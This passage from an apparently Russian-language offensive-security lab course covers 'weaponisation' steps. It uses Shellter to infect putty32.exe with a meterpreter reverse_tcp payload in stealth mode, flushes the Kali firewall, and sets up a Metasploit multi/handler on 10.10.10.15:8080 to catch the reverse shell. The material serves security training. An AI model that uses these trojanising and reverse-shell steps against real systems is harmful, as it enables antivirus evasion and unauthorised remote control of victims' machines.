<div class="me-3" class="me-3 module-1-page-3">

	  <h5 class="card-title custom-title-for-change"><b>11. Вооружение </b> - <i>настройка Shellter</i></h5>
	  <div class="inova-custom-border">
			<p class="ms-3">Настроим Shellter. Одна из приятных особенностей Shellter заключается в том, что он может «заразить» безвредный файл полезной нагрузкой, используя технику, называемую <b>«PE-infection»</b>. Это довольно скрытый способ уклонения от антивирусной защиты. Мы настроим Shellter следующим образом: </p>
			<div class="d-flex justify-content-center">
				<pre><code><b>Выберите Operation Mode - Auto/Manual (A/M/H):</b> A</code><br><code><b>PE Target: /home/student/Desktop/putty32.exe</b></code></pre>
			</div>
			<p class="ms-3">Вы можете игнорировать любые предупреждения, которые могут появиться (просто нажмите «ENTER», чтобы продолжить).</p>
			<div class="d-flex justify-content-center">	
				<pre><code><b>Enable Stealth Mode? (Y/N/H):</b> Y</code><br><code><b>Use a listed payload or custom? (L/C/H):</b> L</code><br><code><b>Select payload by index:</b> 1</code><br><code><b>SET LHOST:</b> 10.10.10.15</code><br><code><b>SET LPORT</b>: 8080</code></pre>
			</div>
			<hr class="ms-3">
			<p class="ms-3"><b>Некоторые примечания:</b></p>
			<div>
				<p class="ms-4"><i>Мы внедряем вредоносную полезную нагрузку в стандартный исполняемый файл  - <b>windows32 putty</b>.</i></p>
				<p class="ms-4"><i>Мы используем полезную нагрузку <b>meterpreter_reverse_tcp</b>, которая является стандартной полезной нагрузкой для <b>Metasploit</b>.</i></p>
				<p class="ms-4"><i>Мы подключим зараженную систему к нам (back-connect/reverse shell) (наша машина Kali имеет IP-адрес 10.10.10.15) через порт 8080.</i></p>
			</div>			
	  </div>
	  <hr>
	
	  <h5 class="card-title custom-title-for-change"><b>12. Вооружение </b> - <i>Убедитесь, что брандмауэр Kali отключен:</i></h5>
	  <div class="inova-custom-border">
			<p class="ms-3">Во время нашей атаки мы собираемся взломать систему и заставить ее подключиться обратно к нам. Чтобы это сработало, мы должны убедиться, что жертва может подключиться к нам. Мы очистим нашу настройку <b>iptables</b> с помощью следующих  команд:</p>
			<div class="ms-3 me-3" id="to-be-clipped-parent" style="white-space:nowrap"><i class="bi bi-clipboard text-primary ms-1" id="clipper" style="cursor:pointer"></i><kbd class="ms-1" data-bs-toggle="tooltip" data-bs-placement="top" title="iptables -F" style="background-color: #DCDCDC;color: black"><small class="to-be-clipped">iptables -F</small></kbd></div>
	  		<div class="ms-3 me-3 mt-2" id="to-be-clipped-parent" style="white-space:nowrap"><i class="bi bi-clipboard text-primary ms-1" id="clipper" style="cursor:pointer"></i><kbd class="ms-1" data-bs-toggle="tooltip" data-bs-placement="top" title="iptables -I INPUT -j ACCEPT" style="background-color: #DCDCDC;color: black"><small class="to-be-clipped">iptables -I INPUT -j ACCEPT</small></kbd></div>
	  </div>
	  <hr>
	  <h5 class="card-title custom-title-for-change"><b>13. Вооружение </b> - <i>запуск Metasploit</i></h5>
	  <div class="inova-custom-border">
			<p class="ms-3">После настройки <b>iptables</b> мы запустим консоль <b>Metasploit Framework</b>, щелкнув ярлык Kali в левой верхней части экрана (1-й значок в строке меню), затем перейдя на вкладку <kbd class="inova-custom-kbd">08-Exploitation Tools > metasploit framework</kbd>. Это запустит новое окно терминала, в котором будет запущена консоль Metasploit.</p>
			<p class="ms-3">После запуска Metasploit, вы получите командную строку <b>metasploit: </b><kbd class="inova-custom-kbd">msf6></kbd></p>
			<hr class="ms-3">
			<p class="ms-3"><i><b>Metasploit</b> - это среда эксплуатации, предназначенная для облегчения создания и использования эксплойтов. Одна из его ключевых сильных сторон состоит в том, что он "стандартизировал" разработку эксплойтов благодаря своей модульной конструкции! Хотя это не курс по взлому, мы будем взаимодействовать с Metasploit в этой наступательной лаборатории, поскольку мы хотим проиллюстрировать, как легко злоумышленники могут запускать атаки на вашу среду.</i></p>
			<p class="ms-3"></p>
			<p class="ms-3"></p>
	  </div>
	  <hr>
	  <img class="img-fluid" src="/assets/img/modules/1/ex-1-ss-13.jpeg">
	  <hr>
	  
	  <h5 class="card-title custom-title-for-change"><b>14. Вооружение </b> - <i>выбор эксплойта</i> </h5>
	  <div class="inova-custom-border">
			<p class="ms-3">Теперь мы будем использовать <b>«multi-handler»</b> Metasploit для обработки входящего соединения от нашего зараженного <u>putty32.exe</u>. Мы можем сделать это, выполнив следующую команду:</p>
			<div class="ms-3 me-3 mt-2" id="to-be-clipped-parent" style="white-space:nowrap"><i class="bi bi-clipboard text-primary ms-1" id="clipper" style="cursor:pointer"></i><kbd class="ms-1" data-bs-toggle="tooltip" data-bs-placement="top" title="use exploit/multi/handler" style="background-color: #DCDCDC;color: black"><small class="to-be-clipped">use exploit/multi/handler</small></kbd></div>
			<p class="ms-3 mt-3	">Вы можете перечислить доступные параметры, запустив:</p>
			<div class="ms-3 me-3" id="to-be-clipped-parent" style="white-space:nowrap"><i class="bi bi-clipboard text-primary ms-1" id="clipper" style="cursor:pointer"></i><kbd class="ms-1" data-bs-toggle="tooltip" data-bs-placement="top" title="show options" style="background-color: #DCDCDC;color: black"><small class="to-be-clipped">show options</small></kbd></div>
			<p class="ms-3 mt-3">Доступных опций не так много, так как обработчик должен быть настроен для правильной полезной нагрузки.</p>
	  </div>
	  <hr>
	  <img class="img-fluid" src="/assets/img/modules/1/ex-1-ss-14.png">
	  <hr>
	  

	<!-- End Default Card -->
  
    <!-- Default Card -->

      <h5 class="card-title custom-title-for-change"><b>15. Вооружение </b><i>- выбор полезной нагрузки</i></h5>
      <div class="inova-custom-border">
			<p class="ms-3">Теперь эксплойт выбран, нам нужно добавить полезную нагрузку («Что мы хотим сделать с нашим эксплойтом?»). Важно, чтобы мы использовали ту же полезную нагрузку, что и настроенная в Shellter: <i>meterpreter/reverse_tcp</i>.</p>
			<div class="ms-3 me-3 mt-3" id="to-be-clipped-parent" style="white-space:nowrap"><i class="bi bi-clipboard text-primary ms-1" id="clipper" style="cursor:pointer"></i><kbd class="ms-1" data-bs-toggle="tooltip" data-bs-placement="top" title="set PAYLOAD windows/meterpreter/reverse_tcp" style="background-color: #DCDCDC;color: black"><small class="to-be-clipped">set PAYLOAD windows/meterpreter/reverse_tcp</small></kbd></div>
			<p class="ms-3 mt-3">При повторном запуске команды show options появляются некоторые дополнительные параметры, специфичные для полезной нагрузки! </p>
			<div class="ms-3 me-3 mt-3" id="to-be-clipped-parent" style="white-space:nowrap"><i class="bi bi-clipboard text-primary ms-1" id="clipper" style="cursor:pointer"></i><kbd class="ms-1" data-bs-toggle="tooltip" data-bs-placement="top" title="show options" style="background-color: #DCDCDC;color: black"><small class="to-be-clipped">show options</small></kbd></div>
			<p class="ms-3 mt-3	">Ниже приведены ключевые параметры, которые нам необходимо настроить:</p>
			<ul>
				<li><p><b>EXITFUNC:</b> <i>метод выхода, используемый полезной нагрузкой, мы будем использовать стандартную  технику по умолчанию.</i></p></li>
				<li><p><b>LHOST:</b> <i>IP-адрес локального приемника для канала C&C Meterpreter </i></p></li>
				<li><p><b>LPORT:</b> <i>порт локального приемника для канала C&C Meterpreter</i></p></li>
			</ul>
	  </div>
	  <hr>
	  <img class="img-fluid" src="/assets/img/modules/1/ex-1-ss-15.png">
	  <hr>
	  
	  <h5 class="card-title custom-title-for-change"><b>16. Вооружение </b> - <i>настройка полезной нагрузки</i></h5>
	  <div class="inova-custom-border">
			<p class="ms-3">После выбора полезной нагрузки мы настроим следующие параметры (как мы это делали в Shellter):</p>
			<ul>
				<li><p><b>LHOST:</b> 10.10.10.15</p></li>
				<li><p><b>LPORT:</b> 8080</p></li>
			</ul>
			<p class="ms-3">Мы можем настроить другие параметры, используя команду <kbd class="inova-custom-kbd">set</kbd>:</p>
			<div class="ms-3 me-3 mt-3" id="to-be-clipped-parent" style="white-space:nowrap"><i class="bi bi-clipboard text-primary ms-1" id="clipper" style="cursor:pointer"></i><kbd class="ms-1" data-bs-toggle="tooltip" data-bs-placement="top" title="set LHOST 10.10.10.15" style="background-color: #DCDCDC;color: black"><small class="to-be-clipped">set LHOST 10.10.10.15</small></kbd></div>
			<div class="ms-3 me-3 mt-3" id="to-be-clipped-parent" style="white-space:nowrap"><i class="bi bi-clipboard text-primary ms-1" id="clipper" style="cursor:pointer"></i><kbd class="ms-1" data-bs-toggle="tooltip" data-bs-placement="top" title="set LPORT 8080" style="background-color: #DCDCDC;color: black"><small class="to-be-clipped">set LPORT 8080</small></kbd></div>
	  </div>
	  <hr>
	  <img class="img-fluid" src="/assets/img/modules/1/ex-1-ss-16.png">
	  <hr>
	  
	  
    <!-- End Default Card -->
</div>